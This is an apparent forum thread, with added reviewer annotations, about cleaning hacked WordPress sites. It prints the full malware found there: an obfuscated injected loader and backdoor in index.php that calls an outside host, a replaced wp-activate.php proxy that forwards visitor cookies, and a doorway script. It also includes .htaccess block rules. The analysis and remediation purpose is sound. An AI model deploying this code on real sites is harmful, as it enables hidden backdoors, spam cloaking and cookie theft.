Сергей


На сайте был пароль на базу данных 123456789 — это могло служить причиной уязвимости? (Примечание рецензента: слабый пароль БД критичен, если MySQL или phpMyAdmin доступны извне, но сам по себе он не даёт записывать файлы на диск. Показанные ниже бэкдоры лежат в файлах WordPress — wp-activate.php, wp-content/plugins/class.php, вставка в index.php, каталог темы /1 — то есть у атакующего был доступ на запись в файловую систему; обычно это уязвимый плагин/тема или украденные FTP/SSH/WP-пароли. Менять нужно все учётные данные, а не только пароль БД, и после смены пароля БД не забыть обновить его в wp-config.php.)

На другом spgspg - сейчас меняю пароли на все БД

Greensneak:
После чистки не забудьте обновить WP и все плагины, сменить все пароли (админ WP, FTP/SSH, БД, панель хостинга), проверить таблицу wp_users на лишних администраторов и сравнить файлы ядра с чистым дистрибутивом той же версии. Поставьте iThemes Security и полностью настройте. На файлы и папки ограничьте права через команды:
# Directories: owner rwx, group/others rx (755).
# NOTE(review): run this after the malicious files are removed, not instead of it -- these are the
# usual WordPress permissions and give no protection against code that already runs as the
# web-server user. Also check file ownership (chown) and consider 600/640 for wp-config.php.
find /путь_к_папке -type d -exec chmod 755 {} +
# Regular files: owner rw, group/others r (644).
find /путь_к_папке -type f -exec chmod 644 {} +

спасибо. права изначально были правильные, а iThemes Security заинтересовал, но надо знать особенности настроек.

хочется включить всё, но там предупреждения о мощности сервера и т.п.

Ещё антивирус 360 Total Security жалуется на файл:

wp-content\plugins\class.php

с описанием "php.script.shell.2"

https://mega.co.nz/#!fINi1ZrA!PhfifJh1dzAAQ2sCrjbGQTvAT7WzSvZXWCXni4D0BQA

Я так понимаю, он и может быть причиной проблем? (Примечание: файл class.php, лежащий прямо в wp-content/plugins, а не внутри папки плагина, — не штатный: WordPress кладёт туда только hello.php и index.php. Судя по имени детекта «php.script.shell», это веб-шелл. Сохраните копию для анализа, удалите файл и проверьте логи доступа веб-сервера на обращения к нему — это покажет, откуда и когда им пользовались.)

Да, я после поиска проблем по всем сайтам вручную, пройдусь ещё айболитом.

Обнаружил в файле index.php вставку (обфусцированный код: при каждом запросе подгружает контент с внешнего хоста и выводит его в страницу, а также содержит бэкдор, вызывающий произвольную PHP-функцию по параметрам запроса; index.php нужно восстановить из дистрибутива WordPress, а не вырезать вставку вручную):

// Injected loader + backdoor (obfuscated). Decoding the two base64 tables:
//   $GLOBALS['_1584599298_'] holds PHP function names, in order: preg_match, file_get_contents,
//   urlencode, urlencode, md5, fgetc, preg_quote, ini_get, file_get_contents, strlen,
//   function_exists, curl_init, curl_setopt, curl_setopt, imagecreatefromgd2, curl_exec,
//   array_map, preg_replace, curl_close, fsockopen, fwrite, trim, feof, fgets, array_flip, fgets,
//   fclose, mt_rand, fdf_set_version, preg_split, socket_get_status, strval, stripslashes.
//   _1342886090($i) returns string constants: client_check, HTTP_ACCEPT_CHARSET, "!.!u",
//   SCRIPT_FILENAME, UTF-8, windows-1251, SERVER_NAME, REQUEST_URI, "jp", HTTP_USER_AGENT, "m",
//   REMOTE_ADDR, ind.ukrstream.in, /get.php?d=, &u=, &c=, &i=1&ip=, &h=, a 32-hex secret, "1",
//   allow_url_fopen, http://, "GET ", " HTTP/1.1\r\n", "Host: ", "\r\n",
//   "Connection: Close\r\n\r\n", "", "/\R\R/", "p", a hard-coded token, "f", "c".
// Behaviour:
//   * error_reporting(0) / display_errors=0 hide every failure from the site owner.
//   * If a cookie named client_check is present, it prints that cookie's value and stops
//     (presumably lets the operator confirm the infection is live).
//   * Charset: UTF-8 if this script's own file matches /!.!u/ (valid UTF-8), else windows-1251,
//     unless the client sent HTTP_ACCEPT_CHARSET.
//   * Builds http://ind.ukrstream.in/get.php?d=<SERVER_NAME+REQUEST_URI>&u=<User-Agent>
//     &c=<charset>&i=1&ip=<REMOTE_ADDR>&h=<md5(secret . host+uri . ua . charset . "1")> and
//     fetches it: file_get_contents() when allow_url_fopen == 1; if fewer than 10 bytes came back,
//     cURL (CURLOPT_HEADER=42 off, CURLOPT_RETURNTRANSFER=19913 on) when available, otherwise a
//     raw fsockopen() GET on port 80 with the headers split off at the first blank line (/\R\R/).
//   * The fetched body is echo'ed into the page unconditionally (`echo $u243_0`): remote-controlled
//     content injection, decided per visitor by the C2 from UA/IP (presumably SEO spam / cloaking).
//   * Backdoor: when $_REQUEST['p'] loosely equals the hard-coded token, the function named in
//     $_REQUEST['f'] is called with stripslashes($_REQUEST['c']) as its argument -- arbitrary code
//     execution for anyone who knows the token. Hunt in access logs for requests carrying p=, f=, c=.
//   * The round()/while() arithmetic and the calls to fgetc, preg_quote, imagecreatefromgd2,
//     array_map, preg_replace, array_flip, fdf_set_version, socket_get_status, strval sit in
//     branches whose conditions are constant (always short-circuited / while(0) / mt_rand range
//     below the threshold); they never execute and exist only to defeat signature scanners.
// Remediation: restore index.php from the WordPress release of the same version. The
// `if (!isset($i613fd138))` guard suggests the blob is designed to be prepended to several files --
// grep the whole docroot for '_1584599298_' and 'client_check'.
error_reporting(0); ini_set("display_errors", "0"); if (!isset($i613fd138)) { $i613fd138 = TRUE; $GLOBALS['_1584599298_']=Array(base64_decode('c' .'HJ' .'lZ' .'19tYXRj' .'a' .'A=='),base64_decode('Z' .'mlsZ' .'V9nZXRf' .'Y29' .'udGV' .'udHM='),base64_decode('' .'dXJsZW5jb' .'2Rl'),base64_decode('dXJsZ' .'W5jb2Rl'),base64_decode('bWQ1'),base64_decode('' .'ZmdldGM' .'='),base64_decode('cHJlZ19xdW' .'90ZQ=' .'='),base64_decode('aW5p' .'X2dld' .'A' .'=='),base64_decode('Zmls' .'ZV9nZXR' .'fY29udG' .'V' .'u' .'dHM='),base64_decode('' .'c3RybGVu'),base64_decode('' .'Zn' .'VuY3Rpb2' .'5fZ' .'Xhpc' .'3Rz'),base64_decode('Y3VybF9pbml0'),base64_decode('' .'Y' .'3VybF' .'9zZX' .'Rvc' .'H' .'Q='),base64_decode('Y3' .'VybF' .'9zZXR' .'vcHQ='),base64_decode('aW1hZ2Vj' .'cmVhdGVmcm' .'9tZ' .'2Q' .'y'),base64_decode('Y3V' .'ybF9leGVj'),base64_decode('YXJyYXl' .'fb' .'WFw'),base64_decode('c' .'HJ' .'lZ19yZ' .'XB' .'sYWNl'),base64_decode('Y' .'3VybF9jbG9zZQ=' .'='),base64_decode('Z' .'nNvY' .'2tv' .'c' .'GVu'),base64_decode('Z' .'ndyaXRl'),base64_decode('' .'dHJpb' .'Q' .'=' .'='),base64_decode('ZmV' .'vZ' .'g=='),base64_decode('Zm' .'dldHM' .'='),base64_decode('YXJyYX' .'lfZm' .'xpcA=='),base64_decode('Zmdl' .'d' .'HM='),base64_decode('ZmNsb' .'3Nl'),base64_decode('bXRfcmFuZA=='),base64_decode('ZmRmX' .'3Nld' .'F92ZX' .'JzaW9' .'u'),base64_decode('cHJlZ19zc' .'G' .'xpdA' .'=='),base64_decode('c' .'29' .'ja2V0X2dldF9' .'z' .'dGF0dXM='),base64_decode('c3' .'Ryd' .'mF' .'s'),base64_decode('c' .'3RyaXB' .'zbG' .'Fz' .'a' .'GVz')); function _1342886090($i){$a=Array('Y2xpZW5' .'0X2N' .'oZWNr','' .'Y2' .'xpZW' .'50X' .'2N' .'oZWN' .'r','SFRUUF9BQ' .'0N' .'FUFRfQ0hBU' .'l' .'NFV' .'A==','I' .'S' .'4hdQ==','U0' .'NSS' .'V' .'B' .'UX0ZJTEVOQU1' .'F','VVR' .'GLTg=','d2l' .'uZG93cy0xMjUx','SFRUU' .'F' .'9BQ0NF' .'U' .'F' .'R' .'fQ0' .'hBUlNFVA==','U' .'0VSV' .'kVSX0' .'5B' .'TU' .'U=','' .'Uk' .'V' .'RVUVTV' .'F9VUkk' .'=','anA=','SFRUUF9VU0VSX0F' .'HRU5' .'U','bQ==','U' .'kVN' .'T1RFX0FER' 
.'FI' .'=','a' .'W5kLn' .'Vrcn' .'N0cmVhbS' .'5' .'pbg' .'=' .'=','L2' .'dl' .'d' .'C' .'5waHA/ZD0=','' .'JnU9','' .'JmM9','Jm' .'k9MSZpcD0' .'=','' .'J' .'mg9','OTdhND' .'BiO' .'GVlOWZh' .'NmE2ZGMy' .'OTE2Z' .'m' .'I0NTcxOTl' .'lNDc=','M' .'Q==','YWxsb3d' .'fdXJsX2ZvcG' .'Vu','' .'aH' .'R0' .'cDovL' .'w=' .'=','Y3V' .'y' .'bF' .'9pbml0','' .'aHR0cD' .'ov' .'Lw' .'==','R0VUIA==','IEhUVF' .'AvMS4xDQ' .'o=','SG9z' .'d' .'Dog','' .'DQo=','Q' .'29' .'ubmVjdG' .'lvbj' .'og' .'Q2xvc2UNCg' .'0' .'K','','L' .'1xSXF' .'I' .'v','cA' .'==','' .'N' .'jEzZmQxMz' .'g=','Z' .'g=' .'=','' .'Yw' .'==');return base64_decode($a[$i]);} if(!isset($u243_0)){if(!empty($_COOKIE[_1342886090(0)]))die($_COOKIE[_1342886090(1)]);if(!isset($u243_1[_1342886090(2)])){if($GLOBALS['_1584599298_'][0](_1342886090(3),$GLOBALS['_1584599298_'][1]($_SERVER[_1342886090(4)])))$u243_2=_1342886090(5);else $u243_2=_1342886090(6);}else{$u243_2=$u243_1[_1342886090(7)];}$u243_3=$_SERVER[_1342886090(8)] .$_SERVER[_1342886090(9)];$u243_4=_1342886090(10);$u243_5=$_SERVER[_1342886090(11)];$u243_6=_1342886090(12);$u243_7=$_SERVER[_1342886090(13)];$u243_8=_1342886090(14);$u243_9=_1342886090(15) .$GLOBALS['_1584599298_'][2]($u243_3) ._1342886090(16) .$GLOBALS['_1584599298_'][3]($u243_5) ._1342886090(17) .$u243_2 ._1342886090(18) .$u243_7 ._1342886090(19) .$GLOBALS['_1584599298_'][4](_1342886090(20) .$u243_3 .$u243_5 .$u243_2 ._1342886090(21));if((round(0+873.5+873.5)+round(0+919.66666666667+919.66666666667+919.66666666667))>round(0+349.4+349.4+349.4+349.4+349.4)|| $GLOBALS['_1584599298_'][5]($_SERVER,$u243_2,$_SERVER,$u243_2,$u243_10));else{$GLOBALS['_1584599298_'][6]($u243_8,$_COOKIE,$u243_8,$u243_3);}if($GLOBALS['_1584599298_'][7](_1342886090(22))== round(0+0.2+0.2+0.2+0.2+0.2)){$u243_0=$GLOBALS['_1584599298_'][8](_1342886090(23) .$u243_8 .$u243_9);}if($GLOBALS['_1584599298_'][9]($u243_0)<round(0+2.5+2.5+2.5+2.5)){if($GLOBALS['_1584599298_'][10](_1342886090(24))){$u243_11=$GLOBALS['_1584599298_'][11](_1342886090(25) 
.$u243_8 .$u243_9);$GLOBALS['_1584599298_'][12]($u243_11,42,FALSE);$GLOBALS['_1584599298_'][13]($u243_11,19913,TRUE);while(round(0+1138.3333333333+1138.3333333333+1138.3333333333)-round(0+1138.3333333333+1138.3333333333+1138.3333333333))$GLOBALS['_1584599298_'][14]($u243_8);$u243_0=$GLOBALS['_1584599298_'][15]($u243_11);if((round(0+240.25+240.25+240.25+240.25)+round(0+432+432+432+432))>round(0+480.5+480.5)|| $GLOBALS['_1584599298_'][16]($u243_12,$_COOKIE));else{$GLOBALS['_1584599298_'][17]($_COOKIE,$_REQUEST,$u243_7,$u243_5);}$GLOBALS['_1584599298_'][18]($u243_11);}else{$u243_13=$GLOBALS['_1584599298_'][19]($u243_8,round(0+20+20+20+20),$u243_14,$u243_10,round(0+10+10+10));if($u243_13){$u243_15=_1342886090(26) .$u243_9 ._1342886090(27);$u243_15 .= _1342886090(28) .$u243_8 ._1342886090(29);$u243_15 .= _1342886090(30);$GLOBALS['_1584599298_'][20]($u243_13,$u243_15);$u243_12=_1342886090(31);while(round(0+4420)-round(0+884+884+884+884+884))$GLOBALS['_1584599298_'][21]($u243_8,$u243_7,$u243_1,$u243_8);while(!$GLOBALS['_1584599298_'][22]($u243_13)){$u243_12 .= $GLOBALS['_1584599298_'][23]($u243_13,round(0+25.6+25.6+25.6+25.6+25.6));if((round(0+1007+1007+1007+1007)+round(0+746.2+746.2+746.2+746.2+746.2))>round(0+4028)|| $GLOBALS['_1584599298_'][24]($u243_7,$u243_12,$u243_11));else{$GLOBALS['_1584599298_'][25]($u243_1,$u243_2,$_REQUEST);}}$GLOBALS['_1584599298_'][26]($u243_13);if(round(0+1762+1762)<$GLOBALS['_1584599298_'][27](round(0+413+413+413),round(0+570+570+570+570)))$GLOBALS['_1584599298_'][28]($u243_5);list($u243_16,$u243_0)=$GLOBALS['_1584599298_'][29](_1342886090(32),$u243_12,round(0+0.5+0.5+0.5+0.5));if((round(0+2707)^round(0+1353.5+1353.5))&& $GLOBALS['_1584599298_'][30]($u243_7,$u243_15))$GLOBALS['_1584599298_'][31]($u243_15,$u243_16);}}}if(@$_REQUEST[_1342886090(33)]== _1342886090(34))$_REQUEST[_1342886090(35)]($GLOBALS['_1584599298_'][32]($_REQUEST[_1342886090(36)]));}echo $u243_0; }

---------- Добавлено 30.03.2015 в 16:20 ----------

В файле wp-activate.php (это штатный файл ядра WordPress для активации аккаунтов; показанное ниже содержимое к нему не относится — файл заменён целиком, поэтому его нужно восстановить из дистрибутива той же версии, а не просто удалить):

<?php

// Malicious replacement for WordPress core wp-activate.php: a reverse proxy that serves
// content fetched from an attacker-controlled host under this site's own domain.

// Name of the query parameter that selects the remote resource.
$p = 'p';

// This site's URL for the proxied page; sent upstream so the C2 can build links back to itself.
$b = 'http://kamelot39.ru/wp-activate.php';

// Upstream (attacker-controlled) host everything is fetched from.
$m = 'http://rofezubi3.ainr.ru/';

// Only acts when ?p=... is present; any other request produces an empty response.
if(isset($_GET[$p])) {

$ch = curl_init();

// Best-effort visitor IP, preferring proxy headers over REMOTE_ADDR.
// NOTE: the `!== false` sits inside strpos()'s argument list, so strpos() searches for the
// coerced boolean `true`, not for ','; the multi-proxy branch is therefore not taken as intended.
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {if (strpos($_SERVER['HTTP_X_FORWARDED_FOR'], ',' !== false)) {$tmp = explode(',',$_SERVER['HTTP_X_FORWARDED_FOR']);$ip = trim($tmp[count($tmp)-2]);}

else $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];} elseif (isset($_SERVER['HTTP_FORWARDED_FOR'])) $ip = $_SERVER['HTTP_FORWARDED_FOR']; elseif (isset($_SERVER['HTTP_X_REAL_IP'])) $ip = $_SERVER['HTTP_X_REAL_IP'];

else $ip = @$_SERVER['REMOTE_ADDR'];

// Upstream URL = C2 host + the raw ?p value (no validation: the visitor chooses the remote path).
curl_setopt($ch, CURLOPT_URL, $m.$_GET[$p]);

// POST body tells the C2 which local URL to embed and who is visiting (IP).
curl_setopt($ch, CURLOPT_POSTFIELDS, '&p='.urlencode($b.'?'.$p.'=').'&ip='.$ip);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

// Referer and User-Agent are relayed verbatim, which lets the C2 answer differently to
// search-engine crawlers than to humans (presumably cloaking / SEO spam).
curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]);

curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);

// hf() (below) copies selected upstream response headers to the visitor.
curl_setopt($ch, CURLOPT_HEADERFUNCTION, 'hf');

// Every visitor cookie is forwarded to the C2 as well -- including WordPress session cookies.
if(!empty($_COOKIE)){$co='';foreach($_COOKIE as $cn => $cv){if($co)$co.='; ';$co.=$cn.'='.addslashes($cv);}curl_setopt($ch, CURLOPT_COOKIE, $co);}

// The upstream body becomes this page's response, unmodified and unescaped.
echo curl_exec($ch);

exit;

}

// Header callback: relays Content-Type, "404"/"301" status lines, Location and Set-Cookie from
// the upstream response, so redirects and cookies chosen by the C2 take effect on this site.
function hf($ch, $hl){if(strpos($hl,'Content-Type')!==false||strpos($hl,'404')!==false||strpos($hl,'301')!==false||strpos($hl,'Location')!==false||strpos($hl,'Set-Cookie')!==false) header($hl);return strlen($hl);}

?>

---------- Добавлено 30.03.2015 в 16:22 ----------

В папке имя_сайта\wp-content\themes\имя_темы\1

файлы:

.htaccess с текстом

# Dropped by the attacker inside the theme's hidden "1" directory.
# NOTE(review): a per-directory .htaccess that turns on RewriteEngine replaces -- does not
# inherit -- the parent .htaccess's rewrite rules for requests under this path (mod_rewrite
# only inherits with RewriteOptions Inherit). Nothing in the site root's .htaccess applies here,
# which is why replacing the root file did not stop the doorway.
RewriteEngine On

RewriteBase /wp-content/themes/имя_темы/1

# Any path under this directory that is not an existing directory ...
RewriteCond %{REQUEST_FILENAME} !-d

# ... or an existing file ...
RewriteCond %{REQUEST_FILENAME} !-f

# ... is handled by the doorway script index.php, which uses the URL remainder as a page id.
RewriteRule .* index.php

и файл index.php

с текстом:

<?php

// Doorway script: every request routed here by the directory's .htaccess is fetched from an
// attacker-controlled host and served under this site's URL (the Google results for
// /wp-content/themes/kamelot/1/<hex> are these pages).

// REQUEST_URI with its first 29 characters cut off, i.e. everything after
// "/wp-content/themes/kamelot/1/" -- the remote page identifier.
$id = substr($_SERVER['REQUEST_URI'], 29);

$ch = curl_init();

// Hex-escaped to defeat simple grep: "http://pohydeika1.ainr.ru/$id".
$url = "http://\x70\x6f\x68\x79\x64\x65\x69\x6b\x61\x31\x2e\x61\x69\x6e\x72\x2e\x72\x75/$id";

// Best-effort visitor IP, preferring proxy headers over REMOTE_ADDR.
// NOTE: the `!== false` sits inside strpos()'s argument list, so strpos() searches for the
// coerced boolean `true`, not for ','; the multi-proxy branch is therefore not taken as intended.
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {if (strpos($_SERVER['HTTP_X_FORWARDED_FOR'], ',' !== false)) {$tmp = explode(',',$_SERVER['HTTP_X_FORWARDED_FOR']);$ip = trim($tmp[count($tmp)-2]);}

else $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];} elseif (isset($_SERVER['HTTP_FORWARDED_FOR'])) $ip = $_SERVER['HTTP_FORWARDED_FOR']; elseif (isset($_SERVER['HTTP_X_REAL_IP'])) $ip = $_SERVER['HTTP_X_REAL_IP'];

else $ip = @$_SERVER['REMOTE_ADDR'];

curl_setopt($ch, CURLOPT_URL, $url);

// Hex-escaped: "http://kamelot39.ru/wp-content/themes/kamelot/1" -- the local doorway base URL,
// reported to the C2 as parameter "baby" together with the visitor IP.
curl_setopt($ch, CURLOPT_POSTFIELDS, '&baby='.urlencode("\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x61\x6d\x65\x6c\x6f\x74\x33\x39\x2e\x72\x75\x2f\x77\x70\x2d\x63\x6f\x6e\x74\x65\x6e\x74\x2f\x74\x68\x65\x6d\x65\x73\x2f\x6b\x61\x6d\x65\x6c\x6f\x74\x2f\x31").'&ip='.$ip);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

// Referer and User-Agent are relayed verbatim so the C2 can serve crawlers and humans
// differently (presumably cloaking).
curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]);

curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);

// hf() (below; hoisted, so the later definition is fine) relays selected upstream headers.
curl_setopt($ch, CURLOPT_HEADERFUNCTION, 'hf');

// All visitor cookies are forwarded to the C2, WordPress session cookies included.
if(!empty($_COOKIE)){$co='';foreach($_COOKIE as $cn => $cv){if($co)$co.='; ';$co.=$cn.'='.addslashes($cv);}curl_setopt($ch, CURLOPT_COOKIE, $co);}

// The upstream body is the page response, unmodified.
echo curl_exec($ch);

// Header callback: relays Content-Type, "404"/"301" status lines, Location and Set-Cookie from
// the upstream response, so redirects and cookies chosen by the C2 take effect on this site.
function hf($ch, $hl){if(strpos($hl,'Content-Type')!==false||strpos($hl,'404')!==false||strpos($hl,'301')!==false||strpos($hl,'Location')!==false||strpos($hl,'Set-Cookie')!==false) header($hl);return strlen($hl);}

?>

Да, это я вчера заменил .htaccess и уже результат, но теперь проблема на аналогичном сайте, который тоже на вордпрессе

http://kamelot39.ru

http://kamelot39.ru/wp-content/themes/kamelot/1/a5a247fcb56cd3934c3c9530a2d22a95

https://www.google.ru/?gws_rd=ssl#q=site:kamelot39.ru&newwindow=1&safe=off&start=240

---------- Добавлено 05.03.2015 в 13:10 ----------

И на втором сайте замена .htaccess на этот не помогла: (Примечание рецензента: .htaccess не лечит взлом. Пока на сервере остаются бэкдоры — подменённый wp-activate.php, class.php в plugins, вставка в index.php, каталог темы /1 с собственным .htaccess и index.php — атакующий продолжает управлять сайтом. К тому же правила ниже взяты из шаблона Joomla (пути /administrator/, /components/, /templates/ и т.п.), вообще не затрагивают /wp-content/themes/, а .htaccess в подкаталоге с RewriteEngine On отменяет родительские правила mod_rewrite для этого каталога. Порядок действий: удалить чужие файлы и каталог /1, восстановить файлы ядра из дистрибутива, сменить все пароли, найти точку входа по логам — и только потом настраивать .htaccess.)

# Copied from Joomla's htaccess.txt ("block out some common exploits").
# NOTE(review): these query-string blocklists are signature filters that are trivially bypassed
# (different encoding, different parameter names) and are unrelated to this incident, where the
# attacker serves content from files he placed on disk. Hardening noise, not remediation.
# -Indexes disables directory listings. If the host's AllowOverride does not include Options,
# this single line makes Apache answer 500 for the whole site.
Options +FollowSymLinks -Indexes

RewriteEngine On

# Block out any script trying to base64_encode data within the URL.

RewriteCond %{QUERY_STRING} base64_encode[^(]*\([^)]*\) [OR]

# Block out any script that includes a <script> tag in URL.

RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]

# Block out any script trying to set a PHP GLOBALS variable via URL.

RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]

# Block out any script trying to modify a _REQUEST variable via URL.

RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})

# Return 403 Forbidden. With [F] the substitution ("index.php") is ignored, so -- despite the
# original Joomla comment -- the homepage is NOT shown; the client only gets a 403.

RewriteRule .* index.php [F]

#

## End - Rewrite rules to block out some common exploits.

#### @RS

# Deny access to php, xml and ini files
# within components and plugins directories
# NOTE(review): the directory list is Joomla's. On WordPress only "/plugins/" (matching
# /wp-content/plugins/...) and, inside some plugin trees, "/modules/" or "/libraries/" can ever
# match; /wp-content/themes/ -- where the doorway directory "1" lives -- is not covered at all,
# and WordPress's xmlrpc.php is a file, not a "/xmlrpc/" directory. A direct request to an
# existing .php file under /plugins/ (such as the flagged class.php) would get a 404, but only
# while this file is in place -- the shell itself is untouched. The rule may also break plugins
# whose PHP endpoints the browser requests directly.

RewriteCond %{REQUEST_FILENAME} -f

RewriteCond %{REQUEST_URI} \.php|\.ini|\.xml [NC]

RewriteCond %{REQUEST_URI} \/components\/ [OR]

RewriteCond %{REQUEST_URI} ^\/includes\/|^\/administrator\/includes\/ [OR]

RewriteCond %{REQUEST_URI} \/language\/ [OR]

RewriteCond %{REQUEST_URI} \/libraries\/ [OR]

RewriteCond %{REQUEST_URI} \/modules\/ [OR]

RewriteCond %{REQUEST_URI} \/plugins\/ [OR]

RewriteCond %{REQUEST_URI} \/templates\/ [OR]

RewriteCond %{REQUEST_URI} \/xmlrpc\/

# On Apache 2.4 a status outside 300-399 in R= makes mod_rewrite drop the substitution and stop,
# so this simply returns 404 (index.php is never reached).
RewriteRule ^(.*)$ index.php [R=404,L]

#### @RS

#### @RS

# Prevent most common SQL-Injections
# NOTE(review): another Joomla signature filter. It catches only the most naive payloads
# (no encoding, keywords in this exact order) and may also reject legitimate query strings
# that happen to contain these words (e.g. site search). It is no substitute for fixed code.

RewriteCond %{query_string} concat.*\( [NC,OR]

RewriteCond %{query_string} union.*select.*\( [NC,OR]

RewriteCond %{query_string} union.*all.*select [NC]

RewriteRule ^(.*)$ index.php [F,L]

#### @RS

#### @RS

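# Block most common hacking tools
# NOTE(review): User-Agent is attacker-controlled and trivially changed, so this only filters the
# laziest scanners; "Wget" also blocks legitimate Wget-based monitoring and cron jobs.
SetEnvIf user-agent "Indy Library" stayout=1

SetEnvIf user-agent "libwww-perl" stayout=1

SetEnvIf user-agent "Wget" stayout=1

# Apache 2.4 without mod_access_compat rejects "deny from" ("Invalid command", i.e. HTTP 500 for
# every request once it appears in .htaccess), so each version gets its own syntax. The
# "Require all granted" is required because a RequireAll holding only a negated Require can
# never grant access.
<IfModule mod_authz_core.c>
    <RequireAll>
        Require all granted
        Require not env stayout
    </RequireAll>
</IfModule>
<IfModule !mod_authz_core.c>
    deny from env=stayout
</IfModule>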

#### @RS

## Begin - Custom redirects

#

# If you need to redirect some pages, or set a canonical non-www to

# www redirect (or vice versa), place that code here. Ensure those

# redirects use the correct RewriteRule syntax and the [R=301,L] flags.

#

## End - Custom redirects

##

# Uncomment following line if your webserver's URL

# is not directly related to physical file paths.

# Update Your Joomla! Directory (just / for root).

##

#

# Joomla's front-controller section (hence "/component/", ".feed", ".raw" below). On this
# WordPress site it is functionally redundant with the "# BEGIN WordPress" block further down:
# both send non-file, non-directory requests to index.php.
# Copies the Authorization request header into an environment variable. Joomla ships this,
# presumably so PHP running as CGI/FastCGI can still see HTTP Basic credentials; review whether
# this host needs it at all.
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]

#

# If the requested path and file is not /index.php and the request

# has not already been internally rewritten to the index.php script

RewriteCond %{REQUEST_URI} !^/index\.php

# and the request is for something within the component folder,

# or for the site root, or for an extensionless URL, or the

# requested URL ends with one of the listed extensions

RewriteCond %{REQUEST_URI} /component/|(/[^.]*|\.(php|html?|feed|pdf|vcf|raw))$ [NC]

# and the requested path and file doesn't directly match a physical file

RewriteCond %{REQUEST_FILENAME} !-f

# and the requested path and file doesn't directly match a physical folder

RewriteCond %{REQUEST_FILENAME} !-d

# internally rewrite the request to the index.php script ([L] ends this pass; mod_rewrite then
# re-runs the file for /index.php, where the first RewriteCond above stops a loop)

RewriteRule .* index.php [L]

#

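# Gzip/deflate compression for text assets. Fixes relative to the pasted version:
#  * "BrowserMatch bMSIE" had lost its backslash: as written it matches the literal string
#    "bMSIE", which no browser sends, so the MSIE exception never applied and every MSIE version
#    (which identifies as "Mozilla/4.0 (compatible; MSIE ...)") fell under the no-gzip rules.
#    "\bMSIE" is the form from the mod_deflate documentation.
#  * "Mozilla/4.0[678]" had an unescaped dot (matches any character); it is literal now.
#  * the inner </ifmodule> sat on the same line as a directive, which Apache would read as an
#    extra argument and then report an unclosed section; it is on its own line now.
<IfModule mod_deflate.c>

AddOutputFilterByType DEFLATE text/html text/plain text/xml application/xml application/xhtml+xml text/javascript text/css application/x-javascript

# Netscape 4.x workaround from the mod_deflate docs: compress only HTML for 4.x, nothing for 4.06-4.08.
BrowserMatch ^Mozilla/4 gzip-only-text/html

BrowserMatch ^Mozilla/4\.0[678] no-gzip

# MSIE also starts its UA with "Mozilla/4.0" but handles compression fine -- undo the above for it.
BrowserMatch \bMSIE !no-gzip !gzip-only-text/html

# mod_gzip (Apache 1.3-era) fallback; inert when the module is not loaded.
<ifmodule mod_gzip.c>

mod_gzip_on Yes

mod_gzip_item_include file \.js$

mod_gzip_item_include file \.css$

</ifmodule>

</IfModule>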

# Browser/proxy cache lifetimes (mod_expires).
# NOTE(review): ExpiresDefault also covers text/html, since no ExpiresByType below overrides it
# and nothing here exempts PHP output. Unless the application sets its own Expires header, HTML
# pages may be cached for up to an hour by browsers and intermediaries -- after a cleanup, the
# spam pages can linger in caches that long.
<IfModule mod_expires.c>

# Enable expiration control

ExpiresActive On

# Default expiration: 1 hour after request

ExpiresDefault "now plus 1 hour"

# CSS and JS expiration: 1 week after request

ExpiresByType text/css "now plus 1 week"

ExpiresByType application/javascript "now plus 1 week"

ExpiresByType application/x-javascript "now plus 1 week"

# Image files expiration: 1 month after request

ExpiresByType image/bmp "now plus 1 month"

ExpiresByType image/gif "now plus 1 month"

ExpiresByType image/jpeg "now plus 1 month"

ExpiresByType image/jp2 "now plus 1 month"

ExpiresByType image/pipeg "now plus 1 month"

ExpiresByType image/png "now plus 1 month"

ExpiresByType image/svg+xml "now plus 1 month"

ExpiresByType image/tiff "now plus 1 month"

ExpiresByType image/vnd.microsoft.icon "now plus 1 month"

ExpiresByType image/x-icon "now plus 1 month"

ExpiresByType image/ico "now plus 1 month"

ExpiresByType image/icon "now plus 1 month"

ExpiresByType text/ico "now plus 1 month"

ExpiresByType application/ico "now plus 1 month"

ExpiresByType image/vnd.wap.wbmp "now plus 1 month"

ExpiresByType application/vnd.wap.wbxml "now plus 1 month"

ExpiresByType application/smil "now plus 1 month"

# Audio files expiration: 1 month after request

ExpiresByType audio/basic "now plus 1 month"

ExpiresByType audio/mid "now plus 1 month"

ExpiresByType audio/midi "now plus 1 month"

ExpiresByType audio/mpeg "now plus 1 month"

ExpiresByType audio/x-aiff "now plus 1 month"

ExpiresByType audio/x-mpegurl "now plus 1 month"

ExpiresByType audio/x-pn-realaudio "now plus 1 month"

ExpiresByType audio/x-wav "now plus 1 month"

# Movie files expiration: 1 month after request

ExpiresByType application/x-shockwave-flash "now plus 1 month"

ExpiresByType x-world/x-vrml "now plus 1 month"

ExpiresByType video/x-msvideo "now plus 1 month"

ExpiresByType video/mpeg "now plus 1 month"

ExpiresByType video/mp4 "now plus 1 month"

ExpiresByType video/quicktime "now plus 1 month"

ExpiresByType video/x-la-asf "now plus 1 month"

ExpiresByType video/x-ms-asf "now plus 1 month"

</IfModule>

########## End - Optimal expiration time

# Tell caches that these assets vary by Accept-Encoding, so a compressed copy is not handed to a
# client that did not ask for one. The trailing colon in "Vary:" is accepted by mod_headers (the
# header name may include the final colon).
<IfModule mod_headers.c>

<FilesMatch "\.(js|css|xml|gz)$">

Header append Vary: Accept-Encoding

</FilesMatch>

</IfModule>

# BEGIN WordPress
# Standard WordPress permalink rules. WordPress may regenerate everything between the BEGIN/END
# markers, so keep custom directives outside them. Redundant here with the Joomla
# front-controller rules above, which already send the same requests to index.php.

<IfModule mod_rewrite.c>

